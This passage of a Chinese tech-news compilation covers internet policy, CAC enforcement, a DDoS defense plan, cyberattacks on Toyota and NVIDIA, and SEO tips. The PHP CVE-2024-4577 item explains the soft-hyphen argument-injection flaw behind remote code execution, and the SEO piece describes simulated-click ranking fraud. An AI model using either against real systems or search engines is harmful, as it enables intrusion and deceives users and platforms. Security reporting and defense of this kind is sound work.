年 12 月增长 5947 万人,占网民整体的 87.9%。 2024 年网络支付机构推进互联互通,各类条码互认互扫赢得进展,支付宝、微信支付与云闪付实现线下条码的互认互扫,推动线上、线下多场景支付互联互通,进一步便利数字消费。 外卖平台开展社区、景区、市政公园、校园等多场景下的无人机外卖配送业务,开通超过 53 条航线满足消费者时效性需求。 #### 中国网络基础设施已经全部支持 IPv6 6月21日消息:据中新网报道,在日前的「2020-2021 全球 IPv6 发展与展望」研讨会上,中国通信标准化协会副理事长兼秘书长闻库表示,互联网深刻影响着全球的经济格局、利益格局和安全格局。 IPv6 将是网络基础设施发展以及产业生态构建的最终方向,加快部署 IPv6 是加快网络强国建设,加速国家信息化进程,助力经济社会发展,赢得未来国际竞争新优势的紧迫需求。 据介绍,目前,网络基础设施方面,在三大运营商,CDN 企业、数据中心企业的共同努力下,已全部支持 IPv6。应用基础设施方面,数据中心、云产品、内容分发也初步具备全国全网 IPv6 的支持服务能力,用户数量和用户的使用量取得不菲的成效。 据了解,IPv6 是「Internet Protocol Version6」(互联网协议第6 版)的缩写,是互联网工程任务组(IETF)设计的用于替代 IPv4 的下一代 IP 协议。用它来取代 IPv4 主要是为了解决 IPv4 地址枯竭问题,同时它也在其他方面对于 IPv4 有许多改进。 #### 中国自主产权的.chn域名亮相 不再害怕美国卡脖子 新华网报道,在5月13-15日“2019·中国云计算和物联网大会”上,我国拥有自主知识产权的“.chn”网络域名首次亮相,这标志着我国已经解决阻碍物联网发展的标准、平台、网络空间资源等三大核心难题,使核心技术不再受制于人,让物联网发展进入快车道。 “2019中国云计算和物联网大会”首次展示了拥有我国自主知识产权的“.chn”网络域名与新一代物联网商用平台。 作为全球第二套计算机通信网络系统,新一代物联网经国内多个机构历时20多年的潜心研发与实用化,现已在系统技术、知识产权、国际标准、国家政策、软硬件、服务能力等方面充分准备就绪。 这次会议上同时首次亮相的新一代物联网商用平台,也已经开始为我国商用物联网提供根服务、静态IP地址、域名解析等底层网络服务。 了解一点网络技术的玩家应该注意到,这篇报道的重点不只是多了一个.chn网络域名,还要看到新一代物联网的根服务也是国内平台提供的,这件事意义更为重要,目前负责解析全球网络域名的13台根服务器主要控制在美国政府手里。 2017年有报道称,我国实施了新的互联网络域名体系,并且增加了多台解析服务器。现在,“.cn”域名下行政、科研及国防网站的域名解析已经不需要通过美 国的根服务器,直接在国内服务器上就可以解析了。 中国自主根域名服务器的成功运行,标志着中国建设自主知识产权的世界上第二张全球性计算机网络的最核心部分已经完工。 #### 中央网信办:2023 年累计约谈网站 10646 家,关闭违法违规账号 127878 个 1 月 31 日消息,据中央网信办今日公告,2023 年全国网信系统严格执行法律法规,大力查处各类网上违法违规行为,取得如下成果: 全年共约谈网站 10646 家; 责令 453 家网站暂停功能或更新; 下架移动应用程序 259 款; 关停小程序 119 款; 会同电信主管部门取消违法网站许可或备案、关闭违法网站 14624 家; 督促相关网站平台依法依约关闭违法违规账号 127878 个。 各级网信部门结合开展“清朗”系列专项行动,持续打击传播网络暴力、谣言信息、淫秽色情信息等违法违规行为,集中整治自媒体和短视频不良导向问题、打击侵害企业合法权益破坏营商环境行为、治理未成年人网络环境、规范生成式人工智能应用,及时查处一批传播违法违规信息、扰乱网络传播秩序、社会影响恶劣的网站平台和账号。 针对百度、必应、夸克浏览器等网站平台未按照法律法规要求尽到管理义务,在搜索环节呈现法律、法规禁止发布或传输的信息问题,国家网信办指导属地网信办分别依法约谈相关网站负责人,责令其限期整改,从严处理责任人,并分别给予罚款行政处罚。 针对抖音、新浪微博、腾讯微信等网站平台存在法律、法规禁止发布或者传输信息的问题,国家网信办指导属地网信办分别依法约谈相关网站负责人,责令其限期整改,处置相关账号,从严处理责任人,并分别给予罚款行政处罚。 针对快手、网易、小红书等网络平台履行主体责任不力,对其用户发布的信息未尽管理义务,造成血腥暴力、虚假信息、煽动对立等不良信息在网上传播;拼多多、淘宝、大众点评等生活服务类平台审核机制不完善,造成封建迷信、低俗色情信息在网上传播等问题,国家网信办指导属地网信办分别依法约谈相关网站负责人,责令其限期整改,处置相关账号,从严处理责任人,并分别给予警告、罚款等行政处罚。 依法关闭“绿色直播”等为网络赌博引流的网站,关闭“中南海杂志网”“求是新媒介网”等一批冒用权威机构名称、严重扰乱网络传播秩序的网站。 下架“梦聊”“小野猫直播”等一批存在大量低俗色情信息的移动应用程序。 督促相关网站平台依法依约处置@江苏侃大山、“偶遇丸子”等一批发布不实信息、蹭炒社会热点事件、宣扬网络暴力的账号。 督促相关网站平台依法依约处置@烟雾缭绕卡姆、“丰慢慢慢”等一批宣扬历史虚无主义、严重扰乱网络传播秩序的账号。 根据网络安全审查结论及发现的问题和移送的线索,国家网信办依法对知网(CNKI)违法处理个人信息行为作出网络安全审查相关行政处罚的决定。 下架“山地卡车运输”“纯白之旅”等一批违法违规处理个人信息的移动应用程序,下架“AI 写作导师”“写作全能王”等一批未按国家有关规定开展安全评估工作,存在较大安全风险的移动应用程序。 #### 中央网信办:我国网民规模、国家顶级域名注册量均为全球第一 8 月 19 日消息,据中国网,8 月 19 日上午,中宣部举行“中国这十年”系列主题新闻发布会,中央网信办副主任、国家网信办副主任、新闻发言人牛一兵介绍新时代网络强国建设成就,并答记者问。 牛一兵表示,我国网民规模、国家顶级域名注册量均为全球第一。互联网发展水平居全球第二。2012 年 —2021 年,我国网民规模从 5.64 亿增长到 10.32 亿,互联网普及率从 42.1% 提升到 73%。建成全球规模最大 5G 网络和光纤宽带,5G 基站数达到 185.4 万个,5G 移动电话用户超过 4.55 亿户。所有地级市全面建成光网城市,行政村、脱贫村通宽带率达到了 100%。IPv6 规模部署成效显著,拥有地址数量居世界第二。我国新一代信息基础设施正朝着高速泛在、天地一体、云网融合、智能便捷、绿色低碳、安全可控的方向加速演进。 中央网信办网络安全协调局局长孙蔚敏表示,落实《网络安全法》《数据安全法》和《个人信息保护法》等法律法规的要求,国家互联网信息办公室联合相关部门修订了《网络安全审查办法》,从今年的 2 月 15 日开始正式实施。新修订的《网络安全办法》,将网络平台运营者开展数据处理活动影响或可能影响国家安全的这种情形纳入到网络安全审查中,并明确要求掌握超过 100 万用户个人信息的网络平台运营者赴国外上市必须向网络安全审查办公室申报审查。根据《网络安全审查办法》,对网络平台运营者赴国外上市审查重点评估企业上市可能带来的核心数据、重要数据或者大量个人信息被窃取、泄露、毁损以及非法利用、非法出境的风险;关键信息基础设施、核心数据、重要数据或者大量个人信息被外国政府影响、控制、恶意利用的风险,以及网络信息安全风险等因素。我们始终支持境内企业依法依规合理利用境外资本市场融资发展。对外开放是我国的基本国策,开放是当代中国的鲜明标识。中国扩大高水平开放的决心不会变,同世界分享发展机遇的这个决心不会变,推动经济全球化朝着更加开放、包容、普惠、平衡、共赢方向发展的决心不会变。 去年 7 月,为防范国家数据安全风险、维护国家安全,保障公共利益,依据《国家安全法》《网络安全法》,网络安全审查办公室按照《网络安全审查办法》对滴滴出行实施了网络安全审查。下一步,我办将指导督促滴滴公司切实做好相应整改工作,消除安全风险隐患。加大对网络安全、数据安全、个人信息保护等领域的执法力度,依法处置危害国家网络安全、数据安全、侵害公民个人信息等违法行为,切实维护国家网络安全、数据安全和社会公共利益,有力保障广大人民群众合法权益。 #### 中央网信办:网站平台要提供一键关闭陌生人私信、评论、转发和 @消息等设置 11 月 4 日消息,据“网信中国”微信公众号,中央网信办现已印发《关于切实加强网络暴力治理的通知》(以下简称《通知》)。 《通知》明确,建立健全网暴预警预防机制,强化网暴当事人保护,严防网暴信息传播扩散,依法从严处置处罚。 《通知》指出,要设置一键防护功能。网站平台要根据自身特点,建立完善紧急防护功能,提供一键关闭陌生人私信、评论、转发和 @消息等设置。用户遭遇网暴风险时,网站平台要及时发送系统信息,提示其启动一键防护,免受网暴信息骚扰侵害。 IT之家附《关于切实加强网络暴力治理的通知》全文: 关于切实加强网络暴力治理的通知 各省、自治区、直辖市党委网信办,新疆生产建设兵团党委网信办: 网络暴力针对个人集中发布侮辱谩骂、造谣诽谤、侵犯隐私等违法信息及其他不友善信息,侵害他人合法权益,扰乱正常网络秩序。为切实加大网暴治理力度,进一步压实网站平台主体责任,健全完善长效工作机制,有效保障广大网民合法权益,维护文明健康的网络环境,现通知如下。 一、建立健全网暴预警预防机制 1.加强内容识别预警。网站平台要建立网暴信息分类标准和典型案例样本库,在区分舆论监督和善意批评的基础上,明确细化涉网暴内容标准,增强识别预警准确性。结合网站平台业务特点和具体处置案例,不断更新分类标准,持续完善样本库。 2.构建网暴技术识别模型。网站平台要综合考虑事件类别、针对主体、参与人数、信息内容、发布频次、环节场景、举报投诉等维度,建立符合自身特点的网暴行为识别模型,及时发现预警网暴倾向性、苗头性问题。 3.建立涉网暴舆情应急响应机制。网站平台要组织专门工作力量,及时收集网暴相关热点话题和舆情线索,强化网暴舆情事前预警,做到防微杜渐、防患未然。根据陌生人私信显著增加、相关话题热度迅速攀升、搜索量快速增长、举报频次加大等情况,及时发现网暴异常行为。 二、强化网暴当事人保护 1.设置一键防护功能。网站平台要根据自身特点,建立完善紧急防护功能,提供一键关闭陌生人私信、评论、转发和 @消息等设置。用户遭遇网暴风险时,网站平台要及时发送系统信息,提示其启动一键防护,免受网暴信息骚扰侵害。 2.优化私信规则。进一步完善私信规则,对接收陌生人私信附加数量、时间、范围等限制,用户可根据自身需要自主设置仅接收好友私信或拒绝接收所有私信。对照网暴信息分类标准,采取技术措施,防范网暴内容通过私信传输。 3.建立快速举报通道。在网站平台评论、私信等位置设置网暴信息快捷投诉举报入口,简化投诉举报程序,网站平台对于明确为网暴信息的应在第一时间予以处置。向用户提供针对网暴信息的一键取证等功能,方便当事人快速收集证据。坚持最有利于未成年人的原则,优先处理涉未成年人网暴举报。 三、严防网暴信息传播扩散 1.加强评论环节管理。网站平台要加强对涉网暴风险的新闻、帖文、话题等信息的评论环节管理,及时清理过滤涉网暴违法违规评论,严控涉网暴不友善评论泛化传播,优先展示权威信息。重点网站平台要将用户公共空间发布的评论在本人账号主页进行公开集纳展示,强化公众监督。 2.加强重点话题群组和版块管理。及时解散网暴信息集中的话题版块,暂停新设相关话题版块。密切巡查以相关事件名称、当事人及相关人员姓名命名的词条、话题、群组、贴吧,及时清理涉网暴内容。排查关闭以匿名投稿、隔空喊话等名义发布导向不良等内容的话题版块和群组账号。 3.加强直播、短视频管理。加强直播和短视频内容审核,及时关停网暴内容集中的直播间,封禁违规主播,对存在网暴风险的短视频先审后发,清理含有网暴信息的短视频,拦截过滤负面弹幕。密切关注网暴当事人开设的直播间,及时管控诱导逼迫自残自杀等信息。 4.加强权威信息披露。各地网信部门要密切关注涉网暴舆情和信息动向,督促协调有关部门和地方加强权威信息发布。对于存在网暴风险的热点事件,网站平台要及时转发推送权威信息,引导网民理性发声,共同抵制网暴行为。 四、依法从严处置处罚 1.分类处置网暴相关账号。一是加强账号发文前警示提醒,对发布不友善信息的账号,提示理性发言。二是对参与网暴的账号进行警示教育,并视情采取禁言、暂停私信功能等措施。三是对首发、多发、煽动发布网暴信息的账号,依法依规采取关闭账号等措施,情节特别严重的,全网禁止注册新账号。四是涉及违法犯罪的,移交相关部门依法追究法律责任。网站平台要强化曝光力度,及时对外公布热点网暴事件处置情况。 2.严处借网暴恶意营销炒作等行为。坚决打击借网暴事件蹭炒热度、推广引流、故意带偏节奏或者跨平台搬运拼接虚假信息等恶意营销炒作的行为,进一步排查背后 MCN 机构,对 MCN 机构采取警示沟通、暂停商业收益、限制提供服务、入驻清退等连带处置措施。对于将账号名称临时修改为事件相关机构、人员的,网站平台应当加强用户真实身份核验。 3.问责处罚失职失责的网站平台。对于网暴信息扎堆、防范机制不健全、举报受理处置不及时以及造成恶劣后果的网站平台,依法依规采取通报批评、限期整改、罚款、暂停信息更新、关闭网站等处置处罚措施,从严处理相关责任人。 五、工作要求 1.提高思想认识。各地网信部门要进一步提高政治站位,充分认识开展网暴问题治理工作的重要意义,进一步细化明确任务要求和工作措施,确保治理工作取得实效。 2.压实工作责任。指导督促网站平台压实主体责任,对照工作要求,优化各项功能设置,提升技术水平,强化问题发现处置,不断完善工作手段,切实增强网暴问题治理能力和水平。 3.强化长效治理。各地网信部门要强化任务督导,组织对属地网站平台措施落实情况开展专项检查,督促整改落实。各地各网站平台要及时总结行之有效的经验做法,完善网暴问题治理的长效机制。 中央网信办秘书局 2022 年 11 月 2 日 #### 中小企业ddos攻击怎么防护 以下是针对中小企业的DDoS防护综合方案,结合成本效益、技术可行性和易操作性设计,涵盖预防、检测、响应和恢复全流程: 一、基础架构优化与成本控制 隐藏源站与流量分散 CDN加速:使用高防CDN(如京东云星盾、百度云防护)隐藏真实服务器IP,将静态资源缓存至全球节点,分散攻击压力。 负载均衡:部署负载均衡器(如百度云弹性负载均衡),将流量分配到多台服务器,避免单点过载,同时支持弹性扩容应对突发流量。 网络设备加固 防火墙规则:配置企业级防火墙,限制单IP连接数和请求频率,过滤非常用协议(如UDP 11211端口)。 协议优化:关闭不必要的服务和端口(如ICMP响应),启用SYN Cookie防御SYN Flood攻击。 低成本云服务迁移 将核心业务迁移至云平台(如华为云、阿里云),利用云服务商的基础防护(如免费5Gbps流量清洗)和弹性带宽,减少本地硬件投入。 二、云防护服务选择 高防IP与流量清洗 购买云服务商的高防IP服务(如速度网络高防IP),通过全球清洗中心过滤恶意流量,支持HTTP/HTTPS层防护,抵御CC攻击和泛洪流量。 选择按需付费模式,中小规模攻击防护成本可控制在千元/月内。 Web应用防火墙(WAF) 部署WAF(如百度云防护WAF)拦截SQL注入、XSS等应用层攻击,并集成人机验证(如验证码)防御自动化工具。 DNS防护 使用具备防护能力的DNS服务(如阿里云DNS、DNSPOD),防止DNS放大攻击,并启用DNS缓存减少查询压力。 三、实时监控与自动化响应 流量监测工具 部署开源监控工具(如Zabbix、Smokeping),设置流量阈值告警,识别异常流量模式(如UDP碎片包激增)。 利用云服务商提供的实时报表(如华为云Anti-DDoS攻击统计),快速定位攻击类型9。 自动化防御策略 配置自动触发规则:当流量超过阈值时,自动启用IP黑名单或切换至备用线路。 结合威胁情报平台(如接入云端威胁库),动态更新恶意IP列表。 四、应急响应与灾备 制定应急计划 明确攻击发生时的责任人、通信流程和关键操作步骤(如切换至备用服务器、联系ISP清洗流量)。 定期演练攻击场景,确保团队熟悉流程(如每季度模拟一次HTTP Flood攻击)。 数据备份与快速恢复 使用云备份服务(如华为云CRB)每日备份关键数据,支持一键恢复至最近健康状态。 准备静态应急页面,在服务器过载时展示维护信息,减少用户流失。 五、员工培训与协同防御 安全意识教育 每季度开展网络安全培训,重点识别钓鱼邮件、可疑链接,避免内部设备成为僵尸网络节点。 制定密码管理规范,强制使用复杂密码并定期更换。 供应商协同 与ISP签订DDoS防护协议,支持BGP黑洞路由临时屏蔽攻击流量。 选择合规的云服务商(如符合GDPR),确保数据安全和法律风险可控。 六、成本优化方案推荐 场景推荐方案成本范围日常防护免费云基础防护 + 高防CDN加速0~500元/月中等规模攻击防御云高防IP(10~50Gbps清洗) + WAF2000~8000元/月突发大规模攻击按需付费流量清洗服务 + 弹性带宽扩容按实际攻击流量计费 实施步骤建议 评估需求:分析业务流量峰值和关键服务(如支付接口),确定防护优先级。 试点部署:先为高价值业务接入CDN和高防IP,验证效果后逐步扩展。 持续优化:每月审查防护日志,调整规则(如更新IP白名单)。 通过以上方案,中小企业能以较低成本构建多层防护体系,平衡安全性与预算限制。核心原则是依赖云服务商能力、强化自动化响应、注重员工参与,避免过度依赖本地硬件投入。 #### 中文 / 日文 PHP CGI 安装包 现9.8 分漏洞 黑客可分发木马、DDoS 拒绝攻击等 根据最新消息,网络安全公司 Akamai 于 7 月 10 日发布博文,表示今年 6 月披露 PHP 漏洞 CVE-2024-4577 之后,隔天就观测到网络上有大量攻击者尝试利用该漏洞发起攻击。 Akamai 表示在 6 月披露该 PHP 后 24 小时,就观察到大量针对蜜罐服务器的漏洞利用尝试。 这些攻击包括传播名为 Gh0st RAT 的远程访问木马、RedTail 和 XMRig 等加密货币矿机以及名为 Muhstik 的 DDoS 僵尸网络。 该漏洞的 CVSS 评分为 9.8 分(满分 10 分),影响 CGI 模式下的安装方式,主要影响使用中文、日本语言的 Windows 版 PHP 安装程序。 Gh0st RAT 恶意软件样本 MITRE ATT&CK TTPs 攻击者利用该漏洞,可以绕过命令行,将参数传递给 PHP 直接解释,漏洞本身问题在于 CGI 引擎没有转义软连字号 (0xAD),没有将 Unicode 字符正确转换为 ASCII 字符,从而导致攻击者可远程代码执行(RCE)。 PHP 目前已经发布版本更新,修复了该漏洞,目前敦促用户尽快升级到 8.1.29、8.2.20、8.3.8 版本,受影响的版本如下: 8.1.x 分支下,影响 8.1.29 此前版本 8.2.x 分支下,影响 8.2.20 此前版本 8.3.x 分支下,影响 8.3.8 此前版本 PHP 8 版本 PHP 7 版本 PHP 5 版本 #### 中文互联网 AI 语料资源平台发布:总大小 2.7T 1 月 11 日消息,中国网络空间安全协会于 1 月 9 日发布公告,面向社会发布中文互联网语料资源平台,支持行业领域、内容模态、体量规模等多种标签分类,便于用户下载与使用。 该协会表示在中央网信办指导下,会同国家互联网应急中心,在前期发布中文互联网基础语料 1.0 的基础上,依托专委会建立的语料共建共享机制,汇聚一批新的高质量可信数据,经过信源筛选、内容过滤、数据去重等一系列严格细致的数据加工处理措施,形成并对社会发布中文互联网基础语料 2.0,规模 120GB,数据 3800 万条。 目前平台共入驻 27 个语料数据集,数据总量约 2.7T,主要分三类: 一是中国网络空间安全协会会同国家互联网应急中心等建设的中文互联网基础语料; 二是人民网、北京智源研究院、上海人工智能实验室等单位共享的互联网语料; 三是中国网络空间研究院、中国国家版本馆、中国大百科全书出版社、中国社会科学院图书馆等单位贡献的优质中文基础语料样本。 用户登录中国网络空间安全协会网站(https://www.cybersac.cn/newhome),点击“中文互联网语料资源平台”链接,通过注册、认证等程序,即可下载相关语料。 网安协会人工智能安全治理专委会负责人表示,数据是发展人工智能的基础关键资源,中文互联网基础语料 2.0 是各界协同共建高质量中文语料的又一重要成果,专委会将持续加强中文互联网基础语料建设,为人工智能技术创新和产业发展提供有力支撑和保障。 #### 中文域名普及 腾讯已启用QQ.中国域名 8月6日 消息:据中国互联网络信息中心消息,近日,腾讯陆续开通解析了“QQ.中国”和“腾讯.中国”两个域名,其中“QQ.中国”解析到腾讯网,“腾讯.中国”解析到腾讯官网。用户在浏览器地址栏中输入“QQ.中国”和“腾讯.中国”,便可快速访问。 据悉,此前百度、当当、中国移动等企业先后开通解析了“小度.中国”、“当当网电子书.中国”、“中国移动.中国”等域名。 据介绍,2010年,“.中国/.中國”域名成为全球首个被正式写入全球互联网根域名系统的纯中文顶级域名。“.中国”顶级域名是我国在互联网上的中文国家顶级域名,由我国全权管理,安全有保障。从技术角度来讲,中文域名技术符合IETF国际技术标准,全球畅通。 不过中文域名普及有待提高,而且国内各大搜索引擎目前都不支持中文域名收录,只有百度勉强收录一些,所以有意使用中文域名的站长需谨慎! #### 中科院等团队研究证实七分饱可延缓衰老 逆转超过1/2衰老细胞 近日,据媒体报道,由中科院领导都研究团队发表在美国权威期刊《细胞》上的一项新研究表明,饮食控制在七分饱都情况下,超过二分之一的衰老细胞和四分之一的衰老基因能够逆转。 研究人员以啮齿类动物大鼠为研究对象,基于高通量单细胞和单核转录组测序技术,绘制了首个哺乳动物衰老和节食的多器官单细胞转录组图谱,系统评估了衰老和节食对机体不同类型组织细胞的影响。 研究中,研究人员将参加试验都大鼠分为3组:年轻任意进食组、年老任意进食组、年老节食组。然后从中年期开始对大鼠进行“七分饱”(任意进食量70%的卡路里摄入量)干预,持续节食9个月。研究员介绍,这相当于人类从约40-45岁开始节食,直持续到70岁。 研究人员发现,“七分饱”干预可降低其细胞、组织和分子水平的衰老指征,使其寿命延长。此外,通过对9个组织中获取的20多万个单细胞及细胞核的转录组分析显示,被检测的组织中均发生了衰老相关的细胞类型组成的改变,这些变化超过一半能被节食抑制。 研究人员表示,多组织免疫炎症压力的升高是衰老的标志性特征,而节食可有效地逆转促炎细胞在衰老组织中的聚集。还发现衰老导致Ybx1基因在多种细胞类型中的表达下调,而节食可以在超过20种细胞类型中逆转这种变化。 研究人员指出,该研究首次在多器官、多组织层面上,系统解析了机体衰老的细胞和分子变化规律,为衰老预警提供了新型生物学标志物。 同时,也揭示了免疫调节系统在节食干预衰老进程中的重要作用,为进一步开发衰老及相关疾病的干预策略奠定了理论基础,在科学应对老龄化方面具有重要价值。 #### 中美贸易战云计算或成为下一个战场? 美国当地时间4月16日,《华尔街日报》报道称,针对中国对美国云计算及其他高科技服务供应商的所谓“不公平限制”,美国正在研究反制措施,从而开辟中美“贸易战”的一块新战场。 知情人士透露,挑起中美贸易摩擦的主力军美国贸易代表办公室(USTR)可能再次动用“301调查”工具发起新一轮贸易投诉,声称中国在高科技服务领域对美国企业设置了所谓的“不公平”的限制。 上述知情人士称,美国贸易代表办公室认为把矛头指向云计算会获得公众支持,但尚未最终决定是否要走这一步。该机构称,亚马逊、微软等美国企业如要在华开展云计算业务,必须与中方设立合资企业并转移技术。而阿里巴巴等中国企业在美却完全不受限制。 所谓301调查,是指根据美国《1974年贸易法》第301条款,美国总统能够单方面实施关税或其它贸易限制,以保护本国产业免受其他国家“不公平贸易做法”的损害,例如违反贸易协定或者增加美国企业负担的“差别对待”等行为。 1980年代,301条款曾被美国主要用来应对日本的摩托车、钢材和其他商品的进口贸易,但是自1995年WTO成立以后,美国政府就很少使用该单边主义色彩浓厚的工具。 2017年8月18日,莱特希泽正式宣布启用301调查,在涉及技术转让、知识产权和创新领域对中国启动调查。 2018年4月3日,美国发布对华“301调查”项下对话加征关税产品建议清单,涉及中国约500亿美元出口,重点为信息和通信技术、航空航天、机器人、医药、机械等行业。数小时后,中方公布对自美进口的大豆、汽车、化工品等500亿美元商品征税的对等措施。 4月5日,特朗普突然命令美国贸易代表办公室考虑再对1000亿美元中国商品加征关税。中方回应称将奉陪到底,不惜付出任何代价,必定予以坚决回击。 如果美国贸易代表办公室再次启动301调查,又是一轮针对中国科技领域的遏制。值得一提的是,4月16日,美国商务部部长罗斯宣布,因中国电信设备商中兴通讯未履行和解协定中的部分协议,美国商务部将禁止美国企业向中兴通讯销售元器件,时间有可能长达7年。 #### 丰田所有日本工厂停工,因供应商遭网络攻击 2月28日消息,据报道,因遭遇网络攻击,丰田汽车将于3月1日关闭日本国内所有工厂。 报道称,一家丰田汽车生产零部件供应商遭到网络攻击,丰田的零部件供应管理系统停止运行。日本工厂关闭一天,将影响丰田每月产量的5%。 同时,丰田正在评估3月2日能否恢复运行,针对媒体的问询,丰田暂未做出回应。 这也不是丰田汽车第一次遭受大规模网络攻击,早在2019年,丰田汽车遭到黑客攻击,旗下多家在日本的子公司310万用户信息受到影响。 此次黑客攻击的服务器上,存储有近310万丰田用户的信息,包括了用户姓名、地址、出生日期、身份信息和就业方面的敏感信息,黑客获取的信息主要是来自东京的经销商,也可能包括日本之外的消费者的信息。 此外,近日,半导体巨头NVIDIA也成为了被被黑客攻击的目标,NVIDIA遭遇网络攻击,甚至导致电子邮件及开发者工具中断。 据悉,一个名为LAPSU$的南美组织对英伟达实施了此次勒索软件攻击,并称他们黑进NVIDIA系统长达一周左右,获得了大约1TB的数据,当前正要求NVIDIA付费赎回。 不知道丰田停工,会不会有利于国内新能源呢?估计明天又是一波大涨。 #### 为什么企业要建网站? 现代社会是一个信息化的社会,互联网已经成为人们获取信息、交流、购物、工作等各种活动的重要渠道之一。因此,企业建立网站已经成为一个必要的趋势,以下是一些原因: 提高企业的知名度:企业建立网站可以向公众展示自己的品牌、产品和服务,提高企业的知名度和形象。 拓展营销渠道:通过网站,企业可以更广泛地推广和营销产品和服务,吸引更多的潜在客户和用户。 提高客户满意度:网站可以提供更快速、方便和个性化的服务,提高客户满意度和忠诚度。 降低营销成本:相对于传统营销方式,企业建立网站可以降低营销成本,提高营销效率。 提供更多的信息:企业网站可以提供更详细和全面的信息,帮助客户更好地了解企业、产品和服务。 支持业务拓展:企业网站可以支持各种业务拓展,如电子商务、在线客服、在线支付等,提高企业的业务效率和竞争力。 总之,企业建立网站可以有效地提高企业的形象和知名度,拓展营销渠道,提高客户满意度和忠诚度,降低营销成本,为企业的业务拓展提供支持。 #### 为什么你坚持写高质量文章对网站排名却没有帮助? 今天在4414论坛看到一篇很火的帖子,大意应该作者花了3个月坚持写原创文章,结果一直没有排名,直到怀疑人生。原文如下: 对,高质量原创文章!我曾经每天花2个小时写了三个月。 大家好,我是虚无,今天分享下我写原创的故事。 相信在做诸位都有自己的一个博客网站,不管是测试还是承接业务或者证明自己的技术,这是seoer必备的一个网站。 因为有个朋友【大鹏】在某商城网站担任seo负责人,所以我经常会接触到seo的信息,慢慢的我就感觉自己行了,想试一把。 说干就干,35的cn域名注册BA,300买了wp原创模板,一年600的vps,网站就上线了。 接下来就要搞内容了,当然要搞高质量的原创文章啊,是个人都在说这个好。 好,去5118把seo的词库down下来,按指数排序,先写指数最低的词。 白天要做站还要见客户,就晚上吃完饭,蹲在书房的椅子上,点上细黄鹤楼,手指开始跃动。 1. 找素材(毕竟当时很多东西还不懂); 2. 拟标题,包含关键词; 3. 写正文,三段论; 4. 配图,121*75比例; 5. 加标签; 6. 发布。 啪啪啪,等我写完两篇的时候,才注意到第一篇的发布时间是40分钟前,也就是说我写一篇大概用了40分钟,加上找素材的时间,一篇原创用的时间将近一个小时! 但是当时激情似火、干劲充足,两个小时就两个小时吧,一天就搞两篇吧。 还真别说,原创的就是好,第二天就收录了,我真是太棒了,买烟的时候直接买了两盒。 咔咔咔,时间过去大概半个月,发的文章都收录了,赶紧去换了几个友情链接。 一个月很快过去了,网站收录50多个页面了,但是没有任何排名,一定是我网站内容太少了,继续更新。 一个半月过去了,还是没有出词,一定是我网站外链太少了,找了几个网站目录,提交了一批。 2个月,怎么还没有排名呢,会不会是我模板有什么问题,又查了查整站的源代码,多的h标签给换掉。 3个月的时候,收录将近两百,我写的文章基本是都收录了,但是依然没有任何关键词,我只能搜网站名字找到自己的博客。 最后一个夜晚,坐在电脑前我没有再更新,我连抽了5根黄鹤楼,给大鹏发了微信 【未完待续】 看到这帖子主机吧不禁感慨现在新站想要出头真的很难,相信很多站长都会遇到这个问题,网站明明内容每天都更新,质量也还不错,就是为什么排名上不去,今天主机吧根据自己的经验给大家分析分析网站如何做排名。 1.服务器要稳定 一些站长贪便宜用一些虚拟主机或者非常便宜的服务器,稳定性非常差,百度蜘蛛根本抓取不到网站排名就别想了。尽量选一些靠近北京的机房,最好是北京机房的,不为啥,就因为百度蜘蛛是北京的。千万别用香港美国的,过墙的机房都不好收录。上图作者600元买的VPS虽然不便宜了,但是不建议用VPS,因为VPS本质上是一台服务器共享几个VPS用户,稳定性远不如云服务器好。可以考虑在腾讯阿里优惠的时候入手一台服务器,价格也不会高哪去,主要还是稳定。 2.域名尽量用老的 新注册的域名百度的态度确实不友好,观察你几个月,你再怎么努力也没用,图上作者因为新注册了域名,导致前期效果不理想,要知道新域名单收录首页百度都会卡上一个半月,后面那些子页面放出来估计都是两个月后的事了。当然那些毅力强的,可以坚持半年以上的可以考虑用新域名。 3.别折腾模板 从上面作者的帖子可以看出,他是经常改模板的,这也是很多站长的通病,觉得这样不行,那样不行,这个不够美观,那个不够好看,其实这些都只是给你自己看而以,现在的百度并不会看这些,一些很丑的网站一样排名很好,别折腾来折腾去的,最后把网站折腾死了。 3.内容要符合搜索需求 我发现好多站长发的东西都是不符合搜索需求的,发一些烂大街的东西,在百度上一搜一大把的东西,即使你做了原创,你认为高质量,但是百度却不这么认为,百度觉得你的网站毫无意义,大家都有的东西我干嘛要给你一个新站排名呢?有时候我们不一定要原创,质量不一定要高,但是我们要符合用户搜索需求,比方说,我们做“SEO”关键词,那是不是烂大街了呢? 全国起码几亿的相关SEO页面,你想要从中脱颖而出根本不可能,而且一般搜SEO的也不是精准用户,但是我们做北京SEO公司、北京SEO哪家强,那是不是很容易得多,全国就几家,而且百度收录这类页面相对少些,只要你内容不差,都是很容易有排名。一些站长老是盯着一些热词,这些热词是相当要资历的,排前面的都是一些做了很多年的,有权威的网站,你干赢人家几乎不可能。 4.有流量你的网站才会有排名 大家记住这个前提,一定是你的网站从百度获得流量了,你的关键词才会有排名,百度只会给流量高的网站排名高,而不会给你一个没有流量的网站排名。这也是为什么一些大站往往发的一坨屎,他的关键词排名一样比你高的原因。所以我们要做的是尽量做一些没有什么流量的内容,哪怕一个月只有一个人访问的内容,你的网站排在第一位,并得到了这个流量,百度慢慢的也会认可你的网站,认可你的权威,这样排名才会上来。 5.学会引流 我这里说的并不是通过微信、QQ这些方法直接引流到你的网站,那样即使你引来的流量很大,百度也不会看到,对你的排名也没有任何帮助。要让用户通过搜索引擎搜索你,并点击你的网站,这样才会加分。这也是快排的原理,快排就是模拟真实用户搜索关键词,然后点击你的网站,达到骗取搜索引擎加分的目的,当然快排是有风险的,很容易导致网站被封。这个时候做品牌的好处就显示出来了,如果你的品牌名在互联网站独一无二,可以引导用户通过百度搜索并找到你,比如主机吧,就是可以通过百度很容易找到,久而久之成为品牌效应,百度自然会给你的文章排名,主机吧目前的文章相关排名都是不错的。 6.坚持 以上都做完了,就只剩下坚持了,做网站想要排名首先得要很大的毅力,可以坚持几年的几乎都是成功的,以主机吧为例,主关键词是百度云加速,这词指数不大,但是权威网站太多,主机吧一开始也不抱什么希望,但是坚持两年后,发现排名真的上去了,而且直接排前五,所以坚持很重要。       #### 为什么使用CDN加速有时更慢了 CDN(Content Delivery Network,内容分发网络)是一种将网站内容分发到全球多个地理位置的服务器的网络,目的是为了让用户从离自己最近的服务器节点获取内容,以提高网站的访问速度和稳定性。然而,在某些情况下,使用CDN可能会导致加载速度变慢,原因如下: 